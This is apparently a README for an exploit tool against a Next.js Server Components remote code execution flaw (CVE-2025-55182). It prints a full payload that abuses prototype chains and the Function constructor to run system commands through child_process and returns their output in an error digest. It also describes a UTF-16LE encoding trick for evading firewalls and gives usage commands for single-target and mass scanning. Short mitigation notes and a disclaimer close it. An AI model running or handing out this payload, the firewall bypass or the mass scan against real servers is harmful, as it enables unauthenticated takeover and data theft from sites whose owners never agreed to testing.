Share
## https://sploitus.com/exploit?id=6245138B-B6F9-544A-AC6F-B85AEF677B95
# 🚨 NextRce β€” CVE-2025-55182 (Next.js / React Server Components RCE)

NextRce is a security research tool demonstrating **CVE-2025-55182**, a critical vulnerability in **Next.js App Router** applications using **React Server Components (RSC)** and **Server Actions**.

This vulnerability allows an attacker to achieve **unauthenticated Remote Code Execution (RCE)** by abusing how Next.js processes **Server Action responses** and resolves serialized RSC payloads on the server.

---

## πŸ›  Vulnerability Overview

**CVE-2025-55182** exists in the **Next.js App Router architecture** and can be classified as a **server-side object injection / prototype chain abuse** issue occurring during the handling of `multipart/form-data` requests.

When a Server Action is triggered, the Next.js server trusts and deserializes structured client input. By sending a specially crafted payload, an attacker can manipulate internal resolution logic and execute arbitrary system commands in the Node.js runtime.

---

## πŸ“Œ Root Cause

The vulnerability arises due to the following combined factors:

- **Server Actions Trust Model**  
  Server Actions accept structured client payloads that are processed through internal React Server Component resolution logic with insufficient validation.

- **Object Injection During RSC Resolution**  
  Crafted payloads can abuse JavaScript prototype chains and constructor references, allowing escape from the intended object scope.

- **Insufficient Sanitization**  
  Internal fields such as `then`, `_response`, and form-data getters are not adequately protected against malicious manipulation.

- **Encoding-Based WAF Bypass**  
  Many Web Application Firewalls focus on UTF-8 or standard JSON. Encoding payloads as **UTF-16LE** allows them to bypass inspection while still being decoded correctly by the Next.js server.

---

## πŸ”¬ Payload Analysis

The exploit relies on injecting a crafted RSC payload inside a multipart request.  
A simplified version of the payload is shown below:

```json
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('{cmd}').toString('base64'); throw Object.assign(new Error('x'),{digest: res});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
```
🧠 Exploit Breakdown
1. Prototype Chain Hijack
json
Copy code
"then": "$1:__proto__:then"
This abuses JavaScript’s prototype chain by overriding the then property, interfering with how Promises are resolved during React Server Component processing in the Next.js runtime.

2. Constructor Escape
json
Copy code
"_formData": {
  "get": "$1:constructor:constructor"
}
This allows access to the global Function constructor, enabling execution of arbitrary JavaScript outside the intended sandbox.

3. Remote Code Execution
js
Copy code
process.mainModule
  .require('child_process')
  .execSync('{cmd}')
Accesses Node.js internal modules

Executes arbitrary operating system commands synchronously

Runs with the same privileges as the Next.js server process

4. Digest-Based Output Exfiltration
js
Copy code
throw Object.assign(new Error('x'), { digest: res });
Next.js suppresses detailed error messages unless a digest field is present.
By attaching the Base64-encoded command output to the digest property, the server unintentionally returns execution results in the HTTP response.

πŸ•΅οΈ WAF Bypass (UTF-16LE)
The payload can be encoded as UTF-16LE and sent as:

pgsql
Copy code
Content-Type: text/plain; charset=utf-16le
Many WAF engines fail to decode and inspect UTF-16LE content, while the Next.js server decodes and processes it correctly, increasing exploitation reliability.

πŸ’₯ Impact
Successful exploitation of CVE-2025-55182 may result in:

πŸ”₯ Full Remote Code Execution

πŸ—„οΈ Access to sensitive data and credentials

πŸ”— Lateral movement within infrastructure

πŸ“¦ Supply-chain compromise

🚨 Complete server takeover

Severity: Critical
Authentication Required: No

πŸ›‘ Mitigation
To protect against CVE-2025-55182:

Upgrade Next.js to a patched version immediately

Disable unused Server Actions

Enforce strict validation of multipart/form-data requests

Add WAF rules to detect UTF-16LE encoded payloads

Monitor abnormal Next-Action headers and request patterns

πŸš€ Usage
Single Target
bash
Copy code
python3 exploit.py -u https://target.com -c "whoami"
Mass Scan with WAF Bypass
bash
Copy code
python3 exploit.py -l urls.txt -B -t 50
⚠️ Disclaimer
This project is provided strictly for educational, research, and authorized security testing purposes.

Do NOT use this tool against systems you do not own or have explicit permission to test.
The author assumes no responsibility for misuse.

πŸ‘€ Author
Aditya Raj
Offensive Security Researcher
Focus: Vulnerability Research, Real-World Exploitation, Secure-by-Design Awareness